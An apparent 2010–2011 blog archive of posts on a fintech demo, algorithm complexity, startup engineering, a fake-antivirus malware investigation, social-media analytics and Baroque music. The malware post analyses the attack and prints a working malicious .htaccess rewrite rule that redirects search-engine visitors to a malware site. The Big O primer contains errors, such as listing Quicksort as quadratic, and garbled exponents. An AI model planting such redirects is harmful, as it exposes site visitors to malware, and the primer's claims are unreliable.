Finovate Spring 2011 and the 3G Blood Bath

Yaacov Apelbaum-Billboard Finovate Spring 2011

Several weeks ago, I had the opportunity to demo at Finovate Spring 2011.  In the past, I have presented at a variety of professional conferences (including Microsoft PDC and IEEE), but preparing and presenting at Finovate was a real eye-opener for me.

In our presentation, I showcased the platform through several complex interactions. As an illustration, we decided to follow a “day in the life of an average teenage user”.  Our user, while cruising around town, utilized his mobile device (a Google Nexus-S running Android 2.3) to perform the following functions:

  1. Acquire product information by scanning the barcode with the built-in camera.
  2. Receive budgetary advice (“You don’t have enough money in your account to buy this camera. Would you like to create a goal for it?”
  3. Create goals on the fly, and post them to a social network. (“Hey everyone, my birthday is coming up. I only need $20 more bucks to buy this great camera!”)
  4. Get a chip-in from a member of his social network (who clicked on the Facebook link, was taken to the chip-in page, and used a credit card to contribute $20.
  5. Locate the best retail deal and store based on price, availability, and location, utilizing the phone’s Goelocation ability.
  6. Complete the transaction at the retail POS using the phone’s NFC capability.

In addition to actually demoing all of these features, I had to allocate enough time during the presentation to talk about data security, encryption, and authentication, as well as to explain how the real-time analytics and business intelligence engines monitored and interacted with the user.

If you’ve never been to Finovate, then you might not know that the demonstrations are attended by the cream of the crop of financial innovators and the banking industry.  You can’t pull any wool over their eyes, they’re too savvy; your demo has to be perfect.  For many Fintech startups, a successful Finovate demo is one of the best ways to get their name around, secure a major strategic partnership, and even get VC funding.

Yaacov Apelbaum-Finovate Spring 2011 Presentation 1 Yaacov Apelbaum-Finovate Spring 2011 Presentation 2

This year, there were over 850 people in the audience; the place was packed.  Due to the condensed nature of the conference, each demo was required to be exactly 7 minutes long.  When your 7 minutes is up, the bell rings, the lights go off, and you get swiftly kicked off the stage so as to clear room for the next presenter.

The whole event is a strange combination of high-tech magic show, circus act, and speed dating.  Following the philosophy that there is no such thing as bad press, it’s not unusual to have a presenters accompany their product demo while playing a ukulele solo or performing a juggling act.

Knowing how challenging the time and content delivery requirements were, we laid out the demo components eight weeks before the presentation and then on a daily basis, we spent an hour practicing it in front of our peers.  As the rehearsals progressed, we improved our timing, streamlined the script, and tweaked the presentation to make it more concise.

The day before the conference, we arrived to the presentation hall the and got on stage for the final dress rehearsal and to test the AV equipment and connectivity.

Yaacov Apelbaum-Finovate 2011 Presenter ListDuring the rehearsal, as I placed the presentation phone on the podium, I noticed that it suddenly lost the 3G network signal.  I moved the phone off the podium and the signal came back.  Clearly, you can’t run a live demo if you don’t have connectivity.  After the rehearsal backstage, I ran into the network guy and asked him why there was such poor 3G connectivity on stage. The man just shrugged his shoulders and said, “It’s a metal building. Your best bet is to connect to the Finovate wireless network tomorrow.”

The next day, thirty minutes before our 1:16 PM demo, we arrived backstage to gear up. I again checked all connectivity and verified that I was still on the network.  It didn’t occur to me to check what wireless network I was actually connected to.

After handing-in all of our equipment to the Finovate staff, we just stayed backstage and watched the presenters go at it.  It turned out to be a blood bath.

One company demoing an iPhone version of their browser app was doing great until they tried to actually login from the device (using 3G).  After 30 seconds of failed attempts they made the strategic decision to continue without the mobile app and instead they narrated what the app was supposed to do.

Yaacov Apelbaum-Finovate Spring 2011 ConferanceAnother company demoing their revolutionary banking web portal (using a laptop with a 3G USB wireless network card) also went up in smoke as they soon discovered that they couldn’t login into their own site.  Their CTO, in an attempt to save the day (still apparently thinking it was some kind of misconfiguration issue), tried to reconfigure the proxy settings on his laptop, forgetting that he was sharing his screen with 850 people.  The audience got treated to his administrative user ID, password, and firewall settings.

This went on and on. One after another, the 3Gers went down like flies. Almost every iPhone app demo using 3G ended up with some critical connectivity problem.

Then, it was our turn. I got on stage, and instinctively looked at the wireless network one more time.  To my horror I noticed that I had almost no reception and that my laptop was strangely connected to a network called “Coffee House”.  “Strange,” I thought to myself, “why would Finovate name their network “Coffee House?” It took me another few seconds to realize that I was connected to the wrong network.  Next, I looked at the demo phone but it was still connected to the “Finovate” network.  You can’t run a demo with only fifty percent connectivity!

As the announcer was introducing us, I noticed a LAN cable on the podium, figuring that at that point I had nothing to lose, I plugged the LAN cable into my laptop and quickly launched the browser. After what seemed like an eternity and just as my partner began the presentation, the home page loaded. What a close call!

Our demo itself went down like a fine Merlot. The pages loaded instantly, the phone transmitted without any issues, and we even finished presenting with a few seconds to spare.  On the way out, I asked the network technician why he hadn’t warned all the presenters that the 3G was flaky. He looked at me with a twinkle in his eye and pointed at a large sign on the wall that read:

“To all presenters, due to the fact that we are located in a metal building and can’t guarantee 3G connectivity on stage, please utilize the Finovate wireless network! We will be happy to configure your devices for you.”

 

© Copyright 2011 Yaacov Apelbaum All Rights Reserved.

Advertisements

Big O Notation

Yaacov Apelbaum-big-o-and-efficiency

Recently, I was chatting with a friend of mine about pre-acquisition due diligence.  Charlie O’Rourke is one of the most seasoned technical executives I know. He’s been doing hardcore technology for over 30 years and is one of the pivotal brains behind FDC’s multi-billion dollar payment processing platforms.  The conversation revolved around a method he uses for identifying processing bottlenecks.
 
His thesis statement was that in a world where you need to spend as little as you can on an acquisition and still turn profit quickly, problems of poor algorithmic implementations are “a good thing to have”, because they are relatively easy to identify and fix.  This is true, assuming that you have his grasp of large volume transactional systems and you are handy with complex algorithms.

In today’s environment of rapid system assembly via the mashing of frameworks and off-the shelf functionality like CRM or ERP, the mastery of data structures by younger developers is almost unheard of.

It’s true, most developers will probably never write an algorithm from scratch. But sooner or later, every coder will have to either implement or maintain a routine that has some algorithmic functionality. Unfortunately, when it comes to efficiency, you can’t afford to make uninformed decisions, as even the smallest error in choosing an algorithm can send your application screaming in agony to Valhalla.

So if you have been suffering from recursive algorithmic nightmares, or have never fully understood the concept of algorithmic efficiency, (or plan to interview for a position on my team), here is a short and concise primer on the subject.

First let’s start with definitions.

Best or Bust:
An important principal to remember when selecting algorithms is that there is no such thing as the “best algorithm” for all problems. Efficiency will vary with data set size and availability of computational resources (memory and processor).  What is trivial in terms of processing power for the NSA, could be prohibitive for the average Joe.

Efficiency:
Algorithmic efficiency is the measure of how well a routine can perform a computational task. One analogy for algorithmic efficiency and its dependence on hardware (memory capacity and processor speed) is the task of moving a ton of bricks from one location to another a mile a way.  If you use a Lamborghini for this job (small storage but fast acceleration), you will be able to move a small amount of bricks very quickly, but the down side is that you will have to repeat the trip multiple times.  On the other hand, if you use a flatbed truck (large storage but slow acceleration) you will be able to complete the entire project in a single run, albeit at slower pace.

Notation:
The expression for algorithmic efficiency is commonly referred to as “Big O” notation.  This is a mathematical representation of how the algorithm grows over time. When plotted as a function, algorithms will remain flat, grow steadily over time, or follow varying curves.

The Pessimistic Nature of Algorithms:
In the world of algorithm analysis, we always assume the worst case scenario.  For example, if you have an unsorted list of unique numbers and it’s going to take your routine an hour to go through it, then it is possible in the best case scenario that you could find your value on the first try (taking only a minute). But following the worst case scenario theory, your number could end up being the last one in the list (taking you the full 60 minutes to find it). When we look at efficiency, it’s necessary to assume the worst case scenario.

 Yaacov Apelbaum-big-o Plot
Image 1: Sample Performance Plots of Various Algorithms

O(1)

Performance is constant for time (processor utilization) or space (memory utilization) regardless of the size of the data set size. When viewed on a graph, these functions show no-growth curve and remain flat.

O(1) algorithm’s performance is also independent of the size of the data set on which it operates.

An example of this algorithm is testing a value of a variable based on some pre defined hash table.  The single lookup involved in this operation eliminates any growth curves.

O(n)
Performance will grow linearly and in direct proportion to the size of the input data set.  The algorithm’s performance is directly related to the size of the data set processed. 

O(2N) or O(10 + 5N) denote that some specific business logic has been blended with the implementation (which should be avoided if possible).

O(N+M) is another way of saying that two data sets are involved, and that their combined size determines performance.

An example of this algorithm is finding an item in an unsorted list or a Linear Search that goes down a list, one item at a time, without jumping.  The time taken to search the list gets bigger at the same rate as the list does.

O(nn)
Performance will be directly proportional to the square of the size of the input data set.  This happens when the algorithm processes each element of a set and that processing requires another pass through the set (this is the square value). Processing a lot of inner loops will also result in the form O(N3), O(N4), O(Nn.).

Examples of this type of algorithm are Bubble Sort, Shell Sort, Quicksort, Selection Sort or Insertion Sort.

O(2N)
Processing growth (data set size and time) will double with each additional element of the input data set. The execution time of O(2N) can grow exponentially.

The 2 indicates that time or memory doubles for each new element in data set.  In reality, these types of algorithms do not scale well unless you have a lot of fancy hardware.

O(log n) and O(n log n) 
Processing is iterative and growth curves peak at the beginning of the execution and then slowly tapper off as the size of the data sets increases.  For example, if a data set contains 10 items, it will take one second to complete; if the data set contains 100 items, it will takes two seconds; if the data set containing 1000 items, it will take three seconds, and so on. Doubling the size of the input data set has little effect on its growth because after each iteration the data set will be halved. This makes O(log n) algorithms very efficient when dealing with large data sets.

Generally, log N implies log2N, which refers to the number of times you can partition a data set in half, then partition the halves, and so on.  For example, for a data set with 1024 elements, you would perform 10 lookups (log21024 = 10) before either finding your value or running out of data.

Lookup # Initial Dataset New Dataset
1 1024 512
2 512 256
3 256 128
4 128 64
5 64 32
6 32 16
7 16 8
8 8 4
9 4 2
10 2 1

A good illustration of this principal can be found in the Binary Search, it works by selecting the middle element of the data set and comparing it against the desired value to see if it matches. If the target value is higher than the value of the selected element, it will select the upper half of the data set and perform the comparison again. If the target value is lower than the value of the selected element, it will perform the operation against the lower half of the data set. The algorithm will continue to halve the data set with each search iteration until it finds the desired value or until it exhausts the data set.

The important thing to note about log2N type algorithms is that they grow slowly. Doubling N has a minor effect on its performance and the logarithmic curves flatten out smoothly.

An example of these type of algorithms are Binary Search, Heap sort, Quicksort, or Merge Sort

Scalability and Efficiency
An O(1) algorithm scales better than an O(log N),
which scales better than an O(N),
which scales better than an O(N log N),
which scales better than an O(N2),
which scales better than an O(2N).

Scalability does not equal efficiency. A well-coded, O(N2) algorithm can outperform a poorly-coded O(N log N) algorithm, but this is only true for certain data set sizes and processing time. At one point, the performance curves of the two algorithms will cross and their efficiency will reverse.

What to Watch for when Choosing an Algorithm
The most common mistake when choosing an algorithm is the belief that an algorithm that was used successfully on a small data set will scale effectively to large data sets (factor 10x, 100x, etc.).

For most given situations, an O(N2) algorithm like Bubble Sort will work well. If you switch to a more complex O(N log N) algorithm like Quicksort you are likely to spend a long time refactoring your code and will only realize marginal performance gains.

More Resources
For a great illustration of various sorting algorithms in live action form, check out David R. Martin’s animated demo.  For more informal coverage of algorithms, check out Donald Knuth’s epic publication on the subject The Art of Computer Programming, Volumes 1-4.

If you are looking for some entertainment while learning the subject, check out AlgoRythimic’s series on sorting through dancing.

 

 

© Copyright 2011 Yaacov Apelbaum All Rights Reserved.

Scaling the Wall

Yaacov Apelbaum-Climbing

Eagerly beginning the wall to scale,
Using only my hands and feet.
Resolved to follow the hardest trail,
I confidently place my cleat.

Suddenly, there’s no foothold to rest,
Desperately, I cling to the wall.
My heart is pounding in my chest,
My ascent slows to a crawl,

My feet and arms tire and shake,
The safety line invites me to bail.
Should I reach for the line and forego the ache,
Or continue to try, maybe fail?

The voice from below says: “Look to the right”,
I reach and grab a far hold.
Propelling free from my previous plight,
Good advice is more precious than gold.

It’s romantic to view the world as a wall,
Scaled heroically by pure self-esteem.
But in complex endeavors you’re certain to fall,
Without the support of a team.

 

© Copyright 2011 Yaacov Apelbaum All Rights Reserved.

The Startup Leap to Success

Yaacov Apelbaum-The Startup Product Leap

One of the most challenging periods for any startup is passing through the “Valley of Death”. During this delicate phase, the organization’s burn rate is high and it has to rapidly achieve the following three goals:

  1. Move from a proof of concept (POC) to a functional commercial product
  2. Reach a cash flow break even
  3. Transition form seed\angel funding to venture capital funding

For startups focusing on the development of SaaS products, this phase also marks an important millstone in the maturity of their product. With increased volume of production users comes stricter SLA’s and the need to implement more advanced operational ability in areas such as: change control, build automation, configuration management, monitoring and data security.

Yaacov Apelbaum-Startup Financing Cycle

If you are managing the technology organization in an early stage startup, you have every reason to be concerned. To the outsider, the success and failure of startups often seems to be shrouded in mystery–part luck part black magic.  But ask a seasoned professional who has successfully gone through the startup meat grinder and he will tell you that success has nothing to do with luck, spells, or incantations.

Having worked with a number of startups, I have come to conclude that the most common reasons for product failure (beyond just not being able to build a viable POC) is the inability to control your product’s stability and scalability.

In the words of Ecclesiastes, there is a time and purpose for everything under heaven.  In the early stages of a startup’s life cycle,  process is negotiable.  Too much process may hinder the speed in which you can build a functional POC.  In later stages, reliable process and procedures (e.g. requirements, QA, unit testing, documentation, build automation, etc., ) are critical. They are the very foundations of any commercial grade product.  Poor quality and performance are self evident and no matter how much marketing spin and management coercion you use, if you are trying to secure an early stage VC funding round, your problems will rapidly surface during the due diligence process.

To avoid the startup blues, keep your eyes on the following areas. Factoring them into your deployment will help you deliver on time and on budget, with the proper scalability and highest quality possible.

Design Artifacts

  1. Before converting your POC to a functional product, take the time to design your core components (i.e. CRM, CMS, DB access, security, API, etc.).  Create a high level design that identifies all major subsystems.  Once you know what they are, zoom into each subsystem and provide a low level design for each these as well.
  2. Resist the temptation to code core functionality before you have a solid and approved scalable architecture (and the documentation for it). 
  3. Let your team review and freely comment about the proposed platform architecture and deployment topology.  Just because a vocal team member has religious technology preferences doesn’t mean that everyone should convert.
  4. No matter how good your technical staff is, when it comes to building complex core functionality (transaction engine, web services API, etc,) don’t give any single individual carte blanche to work in isolation without presenting their design to the entire team.
  5. Document the product as you develop it. Building a complex piece of software without accurate documentation is akin to trying to operate a commercial jet without its flight manual.
  6. To help spread the information and knowledge, establish a company-wide document depository (like a Wiki or SharePoint ) and store all your development and design documents under version control.  Discourage anyone from keeping independent runaway documents of the system.
  7. Maintain an official (and versioned) folder for the platform documentation showing product structure and components, development roadmaps, and technical marketing materials. 

Testing and QA

  1. If you are not writing unit tests you have no way to verify your product’s quality. Relying on QA to find your bugs means that by the time you do (if ever!) it will be too late and expensive to fix them.  Spend a little extra time and write unit tests for every line of code you deploy in production.  When refactoring old code, update the original unit test as well.
  2. Just like most things in life, bugs have a lifecycle, they are born, they live and die.  Effectively tracking them as part of your build and QA process is a prerequisite for their timely resolution.  
  3. If you are discovering a high critical bug count in your “code complete release” (half a percent of source code e.g. 500 bugs for a 100,000 line code base), you may not be production ready.  Stop further deployment and conduct a thorough root cause analysis to understand why you have so many issues. 
  4. If your bug opening/closure rate remains steady (i.e. QA is opening bugs at the same rate development is closing them) and you have reoccurring bug bounces, you may need to reassess the competency of your development resources. This would also be a good time to have a serious heart to heart conversation with the developers responsible for the bugs. Be prepared for some tough HR decisions.

Monitoring and Verification

  1. Just like you wouldn’t drive a car without a functional dashboard, you can’t run quality commercial software without real time visibility into its moving parts.  Implement a monitoring dashboard to track items such as daily builds (and breaks), servers performance, users transactions, DB table space, etc. 
  2. Seeing is believing. Products like Splunk can help you aggregate your operational data.  Once you have this information, show it to your entire team. I personally like to pump it onto a large screen monitor in the development areas so everyone can get a glimpse.

Yaacov Apelbaum-Splunk Monitoring

Image 1: Splunk Dashboard in Action

Security, Scalability and Operations

  1. Unless you are in the snake oil sales business, build your production environment from the get-go for scalability, security, and redundancy.  Don’t look for “bargains” on these technologies, leverage commercial-grade load balancers, firewalls, and backup solutions.
  2. Your production environment is critical to your success, so don’t treat it as a second class citizen or try to manage it with part time resources. As you will quickly discover, a dedicated sys admin and a DBA who know your platform intimately are worth their weight in gold.
  3. You must achieve operational capabilities in build automation, release management, bug tracking, and configuration management before going live.  If you don’t, be prepared to spend most of your productive time fixing boo-boos in the wee hours of the night.
    Implementing many of the above mentioned measures will give you a significant tactical advantage as well as a strategic boost when negotiating with potential VCs.  Having these capabilities on your utility belt will also help you calmly face any future issues as your startup matures.

 

© Copyright 2011 Yaacov Apelbaum All Rights Reserved.

The Anti-Virus Virus Part II

Yaacov Apelbaum-ER Anti-Virus Virus

In the Anti-Virus Virus, I described how certain commercially produced malware propagates via specialty web sites that have been SOE’d to rank at the top of search engine results.

In this posting I will try to identify who is responsible for the malware authorship, its marketing and its distribution.

As a quick refresher: the malware, (a variety of bogus anti-virus applications), is downloaded when you click on a link in a page returned by a search engine.  The redirect to the malicious download only occurs when a user arrives at the site by way of the search engine. At the heart of this exploit are legitimate websites that have been compromised to provide a redirect to the rogue downloads.

This exploit is interesting because in order for it to work, it requires the user to visit the site indirectly.  If you navigate to the site via a bookmark or manually enter the address it will not result in a redirect. This clever aspect of the tactic reduces the chance that the site’s owner will suspect that there is something wrong with his site and thus delay its patching. Site administrators visiting their site directly will not see any evidence of the redirect. However, traffic coming from search engines, (which forms the majority of visits) will keep getting redirected to the malware download.

The underlining technique of such an attack is a modification of the .htaccess file (found on the Apache web server). In some cases this file is replaced completely. In others, it is just modified to include some new rules. The modified .htaccess files will contain settings similar to the following:

 

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} .*mroodsn.*$ [NC,OR]

RewriteRule .* http://malewaresite-omitted/ [R=301,L]

This basically means: redirect any users who arrive from Google, Yahoo, MSN to “malewaresite”. In some cases, common error pages are also redirected by the .htaccess file, like in the following:

ErrorDocument 404 http://malewaresite-omitted/

The results of this re-route, is that unsuspecting users get sent to sites pushing malware.

The root cause in most of these cracks is poor user access controls which result in compromised file and folder permissions on shared hosting servers. This allows compromised accounts on the same physical server to overwrite the .htaccess files in otherwise unrelated sites.

Source and Authorship

I loaded Process Monitor and installed the copy of Antivitus2010 on a quarantined Microsoft Virtual PC running Microsoft XP Professional.  The installation created an entire registry hive that included several autoruns, browser search redirects, and a root kit.  I then fired-up TCPView and examined the application’s outgoing communication.  It didn’t take long before the malware opened a socket to a homing beacon and a list of staging and configuration servers, all of which were located in Russia (Moscow and Kiev).  The domains associated with the servers were registered by Bakasoftware.com which is currently hosted in Canada.

Interestingly, upon startup, the malware called the API GetKeyboardLayout checked for the presence of the following keyboard layouts:

  • Russia
  • Czech Republic
  • Ukraine
  • Belarus
  • Estonia
  • Latvia
  • Lithuania
    If it found one, it terminated itself, further proof that the designers targeted English users.  The analysis of the binaries also confirmed that they were compiled and linked using Russian regional settings.

    Marketing and Distribution

    For software to be commercially viable, it must have effective marketing and distribution channels.  The bogus Antivirus is no exception.  It turns out that even a few US companies have been associated with the distribution of this software.  Several of them have been named as defendants in the Federal Trade Commission’s complaint. Some of these include Innovative Marketing, Inc., a US company registered in Belize and ByteHosting Internet Services, LLC of Ohio, in addition to other American distributers including James Reno, Sam Jain, Daniel Sundin, Marc D’Souza, and Kristy Ross.

    The Federal Trade Commission argued that the defendants have used complex online advertising techniques that violate the fair trade law in order to push a large number of fake security or system maintenance products including ”"WinFixer, WinAntivirus, DriveCleaner, WinAntispyware, ErrorProtector, ErrorSafe, SystemDoctor, AdvancedCleaner, Antivirus XP, and Antivirus 2008, 2009, 2010”.

    We can gain a better glimpse into a typical malware distribution operation by examining the profile of Jain Shaileshkumar, a.k.a. Sam Jain. Mr. Jain is an internet entrepreneur and former CEO of the affiliate marketing network eFront. In 2005 he was ordered to pay $3.1 million to Symantec for selling counterfeit software and violating various IP laws. Jain operated several Internet-based companies including Discount Bob, Shifting Currents Financials, Inc., Innovative Marketing, Inc., Professional Management Consulting Inc., and Shopenter.com, LLC.
    In December 2008, Jain was listed as a defendant in the Federal Trade Commission’s case against so-called "Scareware" applications such as WinFixer. The case alleges that several companies scammed consumers into buying these applications through malware and banner ads.
    According to court records, as of February 11, 2009. Jain is officially listed as a fugitive from justice in the United States.
    Affiliate Program

    The affiliate program is made up of a network of associates. Once a member the likes of Sam Jain is accepted into the program, he is given access to an enterprise control panel permitting them to distribute different flavors of malware as well as a number of techniques for infecting internet-connected computers. Affiliates can make between 58 to 90 percent commission on sales of the software. Such generous commissions can explain why these types of malware products are so popular among spammers.
    Yaacov Apelbaum-Bakasoftware Control Panel 
    Image 1: Bakasoftware Malware Administrative Download Control Panel
    In a true testament to their sophistication, the affiliate members have access to sophisticated web based statistics dashboard.  In it, the franchise owner can view KPIs that include: numbers of daily installs, number purchases by victim (and his CC number), refunds (Chargebacks), and commissions. With such access to real-time sales analytics, they are the envy of many fortune 500 sales organizations.
    Yaacov Apelbaum-Bakasoftware Sales Dashboard  
    Table 1: Bakasoftware Malware Sales Dashboard
    As you can see from Table 1, one affiliate installed 154,825 editions of the software in exactly 10 days and managed to get 2,772 of those to buy the cure. Any commission sales rep will tell you that a 2% conversation rate is very low, but with such a high commission structure, the affiliate was able to earn $146,525.25. A projection of this earning rate would generate over 5.5 million dollars a year. That’s some pocket change.
    Who says that crime doesn’t pay?
    © Copyright 2011 Yaacov Apelbaum All Rights Reserved.

Social Network Analytics – Myth v. Reality

Yaacov Apelbaum-Social Networks Analytics Mysterey and Deception

It may not be obvious, but social networks (SN) have numerous applications that go beyond simple socialization.  Beside the voyeuristic and self promoting aspects, SN data is brimming with fresh, cheap, and accurate target information. This includes, age, demographics, purchasing habits, buying power, education, brand loyalty, influence, and income, just to name a few.

This is pretty powerful stuff, as the insight that can be gleaned from millions of users posting near real-time could revolutionize the way products are launched and marketing decisions are made. It’s no longer necessary to guess what buzzwords will resonate with users for your next campaign – users are already using those words in their public conversations. There’s no longer a reason to take a spraying and praying advertising approach in the hopes that an add will be seen by a fraction of the right buyers. Now, you can easily determine where your target population hangs out and pursue them directly.

So with such promise to disrupt the market, why hasn’t big soft moved into this address space yet? Where are products like the Microsoft Social Media Analytics Server or the IBM Social Network BI Aggregator? After all, large volume data analytics have been around for quite some time. Over the past 20 years, giants the likes of Microsoft, IBM, and Oracle have invested billions of dollars in developing enterprise analytics and decision making solutions. Why not adapt their existing platforms to harvest the Internet through the cloud?

Yaacov Apelbaum-Stats up and down The answer to these questions has a lot to do with the problem of low data quality and inconsistency.  A close examination of blog, forum, Twitter, or Facebook data reveals that they are all a hodgepodge of tidbits of personal information, non-threaded conversations, and poorly typed, spelled, and formatted communications, which renders them virtually useless for structured analytical engines.

You may argue that at least some of the SN analytics companies must be doing something right.  That maybe so, but there is no quantifiable way to gauge how much of their analytics are based on real math and how much is snake oil salesmanship.  Many of the SN analytics providers claim that they developed patented technology to sort through volume, noise, and poor data quality. Others insist that their “secret sauce” algorithms allow them to calculate engagement, find patterns, and even accurately track memic propagation. Most of these claims are dubious at best.  There are many reasons for this, but the operative ones are:

1. Most SN analytics providers don’t harvest their own data, and those that do certainly don’t do so in real-time. Rather, they subscribe to data scraping services like Compete, comScore, Hitwise, Nielsen, Quantcast, etc. The data harvesters only collect data from a small fraction of the relevant websites, blogs or forums.  They do so on a schedule that could be as long as 2 weeks.  Obviously, password protected and membership only sites are not included.  What you get then is a tiny fraction of a weighted sample population that could be weeks old.

2. Companies that scrap platforms like Facebook or Twitter do it via a native API. Due to system performance concerns, the SN sites throttle the amount of data they expose via the API.  If you are looking at a real-time monitoring solution of any of the social networks, be prepared to have very large data gaps and timeouts in your dashboard.

3. Algorithms for determining text sentiment, theme, writer’s sex, age, and education are only effective on large and well formatted compositions. They were designed to work on structured essays that are around 1000 words long. The likelihood of accurately determining any of these characteristic from a 140 char tweet or a blog posting that is riddled with expressions like LOL or OMG is as good as a coin toss.

4. Even the largest data providers only scrape less than 1 percent of relevant Internet data. The analytics you are viewing probably represent information found across no more than a handful of sites, blogs or forums.  Making multi million dollar advertising decisions based on such low quality and small data sets could be very risky.

5. Due to the growing availability of automated tools for the creation of blogs, websites, and posts, we are starting to see a significant amount of machine generated content that is designed to pump-up SEO visibility for adware sites.  Data scrapers are unable to distinguish between machine generated and human typed content, which can result in skewed analytics.

6. Data feeds frequently go through secondary processing before they are presented to users.  This additional refinement may include the removal of partial records (i.e.  missing dates, user names, etc.) or offensive message content like cursing, pornography or spam.  All this massaging further reduces the population size and the accuracy of the results.

So what is the moral of the story?  If you are on a quest for the SN analytics holy grail, you won’t find it, because it all depends on how much YOU are willing to compromise in terms of data sample size, quality and accuracy.

If you are in the market for a SN analytics tool, don’t take any chances by committing to a specific solution before doing your homework.  Ask the vendor to explain to you (in 8th grade level English) how they address the six items mentioned above.  Arrange for a trial period with at least three vendors and then compare their analytics to each other and a benchmark known to you.  This should give you a sense of how accurate the tool is and the margin of error you can expect moving forward.

 

© Copyright 2010 Yaacov Apelbaum All Rights Reserved

Descend, ye Cedars, Haste ye Pines

Yaacov Apelbaum-Solomon Temple

After much procrastination, I’ve finally taken the plunge and digitized our CD collection. It was a colossal, multi-month project but now, hundreds of hours of streaming music later, I got the opportunity to reevaluate Bach and Handel, two of my favorite composers.

Bach and Handel share some interesting history. They were born only 4 weeks apart (Bach 31 March 1685 – Handel 23 February 1685), grew up 60 miles from each other, used the same snake oil salesman eye surgeon (John Taylor), and even passed on the opportunity to marry Buxtehude’s daughter Anna Margareta.  Despite their parallel lives, each eventually developed a distinctive musical style and while both had strong religious convictions, Bach raised a large family (20 children), Handel remained a bachelor.

Yaacov Apelbaum-BachFor me, Bach’s music is a pure intellectual experience. I find his work to have an almost algorithmic quality.  With a few descending organ notes in the Toccata and Fugue in D Minor, Bach rips the universe wide open revealing God’s mathematical handiwork everywhere.

 

Yaacov Apelbaum-HandelHandel, on the other hand, mounts a direct assault on your emotions.  He first floats the theme, and then in repeating iterations he drives it in (almost all of his oratorias follow this MO).  Never verbose, he creates the ultimate expression of the human kinship and longing for the divine through minimalist orchestration.

 

As for artistic evolution,  Bach’s style remained more or less constant throughout his career and he showed little or no interest in new technologies (he rejected the piano forte because it sounded too mellow and was limited in its expressiveness as compared to the harpsichord).  Handel, on the other hand, was a great experimenter and his style was agnostic.   He wrote Esther almost a decade before it was performed privately but then shelved it because he realized that the audience wasn’t ready. It is noteworthy that in the end, it was Handel—the undisputed master of the Italian opera—who eventually did away with this pompous and pretentious genre and replaced it with clean and concise style of the oratorio.

Yaacov Apelbaum-Solomon's TempleOne example of how Handel uses simple orchestration and words as an effective substitute to the contemporary Broadway mega operas can be found in the closing part of Esther. Handel, dedicates over eleven minutes to a choral tour de force discussing the rebuilding of the Temple in Jerusalem.  This finale is only made-up of 8 lines of text with trumpet accompaniment, a simple chorus line, and dueling basses, but the effect is breathtaking.


Chorus
For ever bless’d be thy holy name,
Let Heav’n and earth his praise proclaim.

The Lord his people shall restore,
And we in Salem shall adore.

Mount Lebanon his firs resigns,
Descend, ye Cedars, haste ye Pines
To build the temple of the Lord,
For God his people has restor’d.

No siree!  They don’t write music like that anymore.

© Copyright 2010 Yaacov Apelbaum All Rights Reserved